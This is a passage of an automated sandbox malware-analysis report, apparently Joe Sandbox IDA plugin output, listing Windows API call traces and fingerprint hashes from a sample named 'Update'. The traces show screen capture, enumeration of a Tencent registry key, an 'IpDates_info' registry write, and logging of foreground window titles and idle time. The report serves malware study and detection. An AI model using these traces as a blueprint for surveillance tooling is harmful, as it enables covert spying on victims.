                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0432C0D5
                                              • EnterCriticalSection.KERNEL32(0434FB64), ref: 0432C113
                                              • LeaveCriticalSection.KERNEL32(0434FB64), ref: 0432C124
                                                • Part of subcall function 04329DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04329E04
                                                • Part of subcall function 04329DE0: GdipDisposeImage.GDIPLUS(?), ref: 04329E18
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0432C14C
                                                • Part of subcall function 0432A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0432A48D
                                                • Part of subcall function 0432A460: _free.LIBCMT ref: 0432A503
                                              • GetHGlobalFromStream.OLE32(?,?), ref: 0432C16D
                                              • GlobalLock.KERNEL32(?), ref: 0432C177
                                              • GlobalFree.KERNEL32(00000000), ref: 0432C18F
                                                • Part of subcall function 04329BA0: DeleteObject.GDI32(?), ref: 04329BD2
                                                • Part of subcall function 04329BA0: EnterCriticalSection.KERNEL32(0434FB64,?,?,?,04329B7B), ref: 04329BE3
                                                • Part of subcall function 04329BA0: EnterCriticalSection.KERNEL32(0434FB64,?,?,?,04329B7B), ref: 04329BF8
                                                • Part of subcall function 04329BA0: GdiplusShutdown.GDIPLUS(00673A16,?,?,?,04329B7B), ref: 04329C04
                                                • Part of subcall function 04329BA0: LeaveCriticalSection.KERNEL32(0434FB64,?,?,?,04329B7B), ref: 04329C15
                                                • Part of subcall function 04329BA0: LeaveCriticalSection.KERNEL32(0434FB64,?,?,?,04329B7B), ref: 04329C1C
                                              • GlobalSize.KERNEL32(00000000), ref: 0432C1A5
                                              • GlobalUnlock.KERNEL32(?), ref: 0432C221
                                              • GlobalFree.KERNEL32(00000000), ref: 0432C249
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                              • String ID:
                                              • API String ID: 1483550337-0
                                              • Opcode ID: fcbda059fddb32fbed8c6bafb485b1c47f60fabc8b1e58b669df1b938e931998
                                              • Instruction ID: ba095a7bc736e58103ab110272fd651fe05f651b0002387bd7bcd98b171260ce
                                              • Opcode Fuzzy Hash: fcbda059fddb32fbed8c6bafb485b1c47f60fabc8b1e58b669df1b938e931998
                                              • Instruction Fuzzy Hash: 2E6118B5D00218AFDB10EFE9D9849EEBBB8FF89714F20952AF515A7240DB34A901CF50
                                              APIs
                                              • _memset.LIBCMT ref: 043264C2
                                              • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 043264E2
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04326524
                                              • _memset.LIBCMT ref: 04326560
                                              • _memset.LIBCMT ref: 0432658E
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 043265BA
                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 043265C3
                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 043265D5
                                              • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 04326625
                                              • lstrlenW.KERNEL32(?), ref: 04326635
                                              Strings
                                              • Software\Tencent\Plugin\VAS, xrefs: 043264D8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                              • String ID: Software\Tencent\Plugin\VAS
                                              • API String ID: 2921034913-3343197220
                                              • Opcode ID: 2d3b2b8d688a2d3319a4b7bcec19dfd274cbfbf0c4dd20f73f60014cf36ee84e
                                              • Instruction ID: 6d9817b54e1b4109e54c10f3348c0097030be11a351d9f4cd1b8797275d9bfa6
                                              • Opcode Fuzzy Hash: 2d3b2b8d688a2d3319a4b7bcec19dfd274cbfbf0c4dd20f73f60014cf36ee84e
                                              • Instruction Fuzzy Hash: AC4175F5A40228ABE724DB50CD85FEA737CDF48704F0055D9F709B6041EA74BA858F64
                                              APIs
                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0432A48D
                                              • _malloc.LIBCMT ref: 0432A4D1
                                              • _free.LIBCMT ref: 0432A503
                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0432A522
                                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0432A594
                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0432A59F
                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0432A5C5
                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0432A5DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                              • String ID: &
                                              • API String ID: 2794124522-3042966939
                                              • Opcode ID: 7c1f014b0619718cc5d57747781ebe44e95519f227b38c4988a823194ef01cb1
                                              • Instruction ID: 941215f4243bbfe0698f43fcf0bea7e6cf3cd8b896a17fb28915fd4ac51a57b8
                                              • Opcode Fuzzy Hash: 7c1f014b0619718cc5d57747781ebe44e95519f227b38c4988a823194ef01cb1
                                              • Instruction Fuzzy Hash: A15163B2A006259FDB04EFA4D944AEFB7B8EF48354F10A159E905A7250D734F905CFE1
                                              APIs
                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                              • RegCloseKey.KERNEL32(?), ref: 100053BB
                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                              • Sleep.KERNEL32(00000BB8), ref: 10005434
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                              • String ID: IpDates_info$SOFTWARE
                                              • API String ID: 864241144-2243437601
                                              • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                              • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                              • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                              • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                              APIs
                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                              • RegCloseKey.KERNEL32(?), ref: 100053BB
                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                              • Sleep.KERNEL32(00000BB8), ref: 10005434
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                              • String ID: IpDates_info$SOFTWARE
                                              • API String ID: 864241144-2243437601
                                              • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                              • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                              • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                              • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1DDB74,?,6C1D26E9,?,6C1DD034), ref: 6C1EE7BE
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,?,?,?,?,6C1DDB74,?,6C1D26E9,?,6C1DD034), ref: 6C1EE830
                                              • GlobalHandle.KERNEL32(?), ref: 6C1EE83A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 6C1EE84C
                                              • GlobalReAlloc.KERNEL32(?,00000000), ref: 6C1EE867
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1EE872
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C1EE8BF
                                              • GlobalHandle.KERNEL32(?), ref: 6C1EE8D3
                                              • GlobalLock.KERNEL32(00000000), ref: 6C1EE8DE
                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DDB74,?,6C1D26E9,?,6C1DD034,8BAE044A), ref: 6C1EE8ED
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                              • String ID:
                                              • API String ID: 2667261700-0
                                              • Opcode ID: 64985d9b777984e2f47d7e23cb5d84406d47053d3e7e55997edce358ac79aafc
                                              • Instruction ID: df7937d83f0d4352e8690ccb626798e19176a52805c7effb97d7afd613a90934
                                              • Opcode Fuzzy Hash: 64985d9b777984e2f47d7e23cb5d84406d47053d3e7e55997edce358ac79aafc
                                              • Instruction Fuzzy Hash: 50419471601A15EFEB048F64C884F99B7F8FF0A305F104169E416D7950DB70EA64DBD1
                                              APIs
                                                • Part of subcall function 6C331F73: CreateFileW.KERNEL32(6C1C6E59,00000000,?,6C331C17,?,?,00000000,?,6C331C17,6C1C6E59,0000000C), ref: 6C331F90
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C331C82
                                              • __dosmaperr.LIBCMT ref: 6C331C89
                                              • GetFileType.KERNEL32(00000000), ref: 6C331C95
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C331C9F
                                              • __dosmaperr.LIBCMT ref: 6C331CA8
                                              • CloseHandle.KERNEL32(00000000), ref: 6C331CC8
                                              • CloseHandle.KERNEL32(6C328E1C), ref: 6C331E15
                                              • GetLastError.KERNEL32 ref: 6C331E47
                                              • __dosmaperr.LIBCMT ref: 6C331E4E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID:
                                              • API String ID: 4237864984-0
                                              • Opcode ID: 4d1c7b21cbadd04190b355e0d2a603dbc60405fc1d16421bf723c9b0600db68a
                                              • Instruction ID: 6cfe082ddd9314db8476354243b1b671f4db7df5acab0216d598129595d6ef5a
                                              • Opcode Fuzzy Hash: 4d1c7b21cbadd04190b355e0d2a603dbc60405fc1d16421bf723c9b0600db68a
                                              • Instruction Fuzzy Hash: D5A17632B141A49FCF099F68DC55BAD7BB4AB47328F14024DE858AB790D736C816CF92
                                              APIs
                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,043412F8,45F3111E,00000001,00000000,00000000), ref: 0432CAB1
                                              • RegQueryInfoKeyW.ADVAPI32(043412F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0432CAE0
                                              • _memset.LIBCMT ref: 0432CB44
                                              • _memset.LIBCMT ref: 0432CB53
                                              • RegEnumValueW.KERNEL32(043412F8,?,00000000,?,00000000,?,00000000,?), ref: 0432CB72
                                                • Part of subcall function 0432F707: _malloc.LIBCMT ref: 0432F721
                                                • Part of subcall function 0432F707: std::exception::exception.LIBCMT ref: 0432F756
                                                • Part of subcall function 0432F707: std::exception::exception.LIBCMT ref: 0432F770
                                                • Part of subcall function 0432F707: __CxxThrowException@8.LIBCMT ref: 0432F781
                                              • RegCloseKey.KERNEL32(043412F8,?,?,?,?,?,?,?,?,?,?,?,00000000,043412F8,000000FF), ref: 0432CC83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                              • String ID: Console\0
                                              • API String ID: 1348767993-1253790388
                                              • Opcode ID: a2eb533a1b8e32d6e442778091dde41da693e57fd24538fe1f9da8ed69915459
                                              • Instruction ID: fe8a40ae672aa85402158506ab0e0cea92c731c881c6cb9ecdfb224e51269188
                                              • Opcode Fuzzy Hash: a2eb533a1b8e32d6e442778091dde41da693e57fd24538fe1f9da8ed69915459
                                              • Instruction Fuzzy Hash: 3061FCB5A00219AFDB04DFA8D981EEEB7B8FF48314F14556AE915A7241DB34A901CBA0
                                              APIs
                                                • Part of subcall function 0432F707: _malloc.LIBCMT ref: 0432F721
                                              • _memset.LIBCMT ref: 0432BB21
                                              • GetLastInputInfo.USER32(?), ref: 0432BB37
                                              • GetTickCount.KERNEL32 ref: 0432BB3D
                                              • wsprintfW.USER32 ref: 0432BB66
                                              • GetForegroundWindow.USER32 ref: 0432BB6F
                                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0432BB83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                              • String ID: %d min
                                              • API String ID: 3754759880-1947832151
                                              • Opcode ID: 9e93eec8f079c9231c0b93e980bd39a4d2757307a480e2b3667b035f0dfec2c1
                                              • Instruction ID: e55baaa336e1f25d78e460593316bbc1bfeb4322958d2f8f976ccbafb499d2f0
                                              • Opcode Fuzzy Hash: 9e93eec8f079c9231c0b93e980bd39a4d2757307a480e2b3667b035f0dfec2c1
                                              • Instruction Fuzzy Hash: 5441C4B5900128AFDB10DFA4D985EAFBBB8EF48710F049054F909AB355DA74BA00CBE1
                                              APIs
                                              • GetCurrentProcessId.KERNEL32(45F3111E,00000000,00000000,75BF73E0,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326938
                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326947
                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 04326960
                                              • CloseHandle.KERNEL32(00000000,?,00000000,043410DB,000000FF,?,04326AB3,00000000), ref: 0432696B
                                              • SysStringLen.OLEAUT32(00000000), ref: 043269BE
                                              • SysStringLen.OLEAUT32(00000000), ref: 043269CC
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,043410DB,000000FF), ref: 04326A2E
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,043410DB,000000FF), ref: 04326A34
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                                              • String ID:
                                              • API String ID: 429299433-0
                                              • Opcode ID: 99ae4be7ceaaf794879a4a4531bc5e5449768a7ff387ceb4e49b7276fe8116e9
                                              • Instruction ID: 910edda04f88d310efaaa38a92f11f1725696499912f3f27c5f87b3d58afac73
                                              • Opcode Fuzzy Hash: 99ae4be7ceaaf794879a4a4531bc5e5449768a7ff387ceb4e49b7276fe8116e9
                                              • Instruction Fuzzy Hash: 2641B6B2D005389BDB10DFA8CD41AAEB7F8FF44714F145666E915F7240DB7579008BA0
                                              APIs
                                              • _memset.LIBCMT ref: 04326DD9
                                              • RegOpenKeyExW.KERNEL32(80000001,04345164,00000000,00020019,75BF73E0), ref: 04326DFC
                                              • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 04326E4A
                                              • lstrcmpW.KERNEL32(?,04345148), ref: 04326E60
                                              • lstrcpyW.KERNEL32(043256EA,?), ref: 04326E72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                              • String ID: GROUP
                                              • API String ID: 2102619503-2593425013
                                              • Opcode ID: 7422584eb8c6fbaf985000b1a41ca6e5feae56b158ac2816112fdfc2e18a5a30
                                              • Instruction ID: 3b151bfd6c999368947f5d5faff44a9fde25c8fccad8eb8ec9cb64116a1d942d
                                              • Opcode Fuzzy Hash: 7422584eb8c6fbaf985000b1a41ca6e5feae56b158ac2816112fdfc2e18a5a30
                                              • Instruction Fuzzy Hash: 9F318771900329ABDB60DF90EE89BDEB7B8FF48714F105299E515A7190DB78BA40CF90
                                              APIs
                                              • ___set_flsgetvalue.LIBCMT ref: 0432FA4E
                                              • __calloc_crt.LIBCMT ref: 0432FA5A
                                              • __getptd.LIBCMT ref: 0432FA67
                                              • CreateThread.KERNEL32(00000000,00000000,0432F9C4,00000000,00000000,0432E003), ref: 0432FA9E
                                              • GetLastError.KERNEL32(?,00000000,?,?,0432E003,00000000,00000000,04325F40,00000000,00000000,00000000), ref: 0432FAA8
                                              • _free.LIBCMT ref: 0432FAB1
                                              • __dosmaperr.LIBCMT ref: 0432FABC
                                                • Part of subcall function 0432F91B: __getptd_noexit.LIBCMT ref: 0432F91B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                              • String ID:
                                              • API String ID: 155776804-0
                                              • Opcode ID: a70d8cf0b3cc8645bce5363ad94ec5ad91f07b6ebb0297c83f60415fedad536a
                                              • Instruction ID: 687ed70318eaf296d893ebea97fc2c76342fe501e077d82f1c50cf26587af47b
                                              • Opcode Fuzzy Hash: a70d8cf0b3cc8645bce5363ad94ec5ad91f07b6ebb0297c83f60415fedad536a
                                              • Instruction Fuzzy Hash: C911A532204B26BFF711AFA9ED4099B37A8DF45778B106026F91597190DB71F8019F60
                                              APIs
                                              • ___set_flsgetvalue.LIBCMT ref: 10007240
                                              • __calloc_crt.LIBCMT ref: 1000724C
                                              • __getptd.LIBCMT ref: 10007259
                                              • CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
                                              • _free.LIBCMT ref: 100072A3
                                              • __dosmaperr.LIBCMT ref: 100072AE
                                                • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                              • String ID:
                                              • API String ID: 155776804-0
                                              • Opcode ID: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                              • Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
                                              • Opcode Fuzzy Hash: 734b10ab9ba7f1921b38ce4142f5ff93c1ead5fd9a2afb223c48f08537fb4c8c
                                              • Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0
                                              APIs
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04327523), ref: 0432743D
                                              • GetProcAddress.KERNEL32(00000000), ref: 04327444
                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04327523), ref: 04327452
                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04327523), ref: 0432745A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 3433367815-192647395
                                              • Opcode ID: 21f58063fa034a27ff56525eb387a52504313d62ee52e1d17d2c64ffba8e0422
                                              • Instruction ID: 96c71f509c9ffba7af60307b3e2e6f5de79f50d4811d1eff9e55eceeb90da06f
                                              • Opcode Fuzzy Hash: 21f58063fa034a27ff56525eb387a52504313d62ee52e1d17d2c64ffba8e0422
                                              • Instruction Fuzzy Hash: 0E01D6B4D002099FCB50DFF599446EEBBF9EB48300F5055AAE919E2240EB79AA508F61
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C24A439
                                                • Part of subcall function 6C1EC870: EnterCriticalSection.KERNEL32(6C3A0410,?,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8A1
                                                • Part of subcall function 6C1EC870: InitializeCriticalSection.KERNEL32(00000000,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8B7
                                                • Part of subcall function 6C1EC870: LeaveCriticalSection.KERNEL32(6C3A0410,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8C5
                                                • Part of subcall function 6C1EC870: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C1D8ABC,00000001,?,6C1D8FDB,?,AfxFrameOrView140su,00007A02,?), ref: 6C1EC8D2
                                              • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C24A48C
                                              • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C24A4A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                              • String ID: DragDelay$DragMinDist$windows
                                              • API String ID: 3965097884-2101198082
